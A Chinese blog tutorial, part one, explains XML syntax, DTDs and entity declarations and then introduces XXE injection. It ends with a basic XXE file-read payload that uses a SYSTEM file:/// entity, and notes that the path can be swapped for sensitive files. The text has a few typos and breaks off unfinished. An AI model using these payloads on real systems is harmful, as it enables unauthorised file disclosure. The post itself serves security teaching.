XXE漏洞(上)

本文详细介绍了XML的自定义标签、DTD的使用、文档结构规则以及XML外部实体注入(XXE)漏洞。通过实例展示了如何利用XML进行数据传输和潜在的安全风险,包括文件读取攻击。
摘要由CSDN通过智能技术生成

xml

特点:标签可以自定义
XML(可扩展标记语言)是一种用于表示和传输数据的标记语言。它设计用于具有自定义结构的文档和数据的描述,具有跨平台和跨语言的特性。
XML声明:
<?xml version="1.0" encoding"utf-8">
xml文档有元素构成,每一个元素包括开始标签,结束标签,元素内容。
对xml标签区分大小写:
语法规则:
  • XML 文档必须有一个根元素
  • XML元素都必须有一个关闭标签
  • XML 标签对大小写敏感
  • XML 元素必须被正确的嵌套
  • XML 属性值必须加引号
DTD
文档类型定义,可被成行地声明与XML文档,也可以外部引用
<!ELEMENT 元素名 类型> 定义标签
例如:
<!ELEMENT 班级 (学生+)> 
DTD文档
引入外部的DTD文档分为俩种:
当引用的DTD文件是本地文件的时候,用 SYSTEM标记,并写上"DTD的文件路径",如下:
<!DOCTYPE 根元素 SYSTEM "DTD的文件路径">
引用的DTD文件是公共文件,PUBLIC 是跟远程路径
<!DOCTYPE 根元素 PUBLIC "DTD名称" "DTD文件的url">

带有 DTD 的 XML 文档实例

<?xml version="1.0"?>
<!DOCTYPE note [  //其中定义了此文档的note 类型的文档
<!ELEMENT note (to,from,heading,body)>  //note 元素定义了四个元素:to,from ,heading,body
<!ELEMENT to (#PCDATA)>  //to元素 伪#pcdata类型
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
]>
<note>
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend</body>
</note>

外部文档声明

xml内容
<?xml version="1.0"?>
<!DOCTYPE note SYSTEM "note.dtd">  //引用本地文件,note.dtd 其中根元素名称为 note
<note>
  <to>Tove</to>
  <from>Jani</from>
  <heading>Reminder</heading>
  <body>Don't forget me this weekend!</body>
</note>

DTD的"note.dtd文件"
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>

DTD基本语法:

<!ELEMENT NAME CONTENT>
ELEMENT---关键字,不能修改
NAME——元素名称
CONTENT——元素类型,必须大写,内容的三种写法:
EMPTY ——元素不能包含子元素和文本,但可以有属性
ANY——元素可以包含任何在该DTD定于内容
#PCDATA——可以包含容易字符数据,但不能其他的包含任何子元素
其中

DTD声明实体

实体是用于定义引用普通文本或特殊字符的快捷方式的变量。
  • 实体引用是对实体的引用。
  • 实体可在内部或外部进行声明。

内部实体声明代码

<!ENTITY writer "Donald Duck."> //定义了writer 实体,这个实体的内容就是Donald Duck.
<!ENTITY copyright "Copyright runoob.com"> //定义了copyright实体,这个实体的内容就是Copyright runoob.com,这个实体充当变量使用
XML
<author>&writer;&copyright;</author> //引用使用&,这样输出的就是这个变量的内容

XXE漏洞

xxe漏洞全称xml Ecternal Entity lijection 即xml外部实体注入漏洞,xxe漏洞发生在应用程序解析xml 输入时,没有静止外部实体的加载,导致可加载恶意外部文件,造成文件读取,命命执行,内网端口扫描,攻击内网网站,发起dos攻击等
特征:在http的request出现请求报文中,表明使用xml来传数据传输,来测试xxs漏洞
实例:
抓包
我们可以发现:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

其中可以使用xml进行数据传送的

写一个简单的payload
<?xml version = "1.0"?>
<!DOCTYPE note [
    <!ENTITY hacker "你好xxe">
]>
<note>&hacker;</note>
可以看到我们的字符串被运行了的,然后写文件读取
文件读取:
<?xml version="1.0"?>  
<!DOCTYPE foo [    
 <!ENTITY xxe SYSTEM "file:///D:/a.txt" > 
]> 
 <foo>&xxe;</foo>
查看D盘下的文件
可以替换成各种敏感信息文件,这就是简单的文件读取,太晚了,后续的再补。。。
  • 7
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值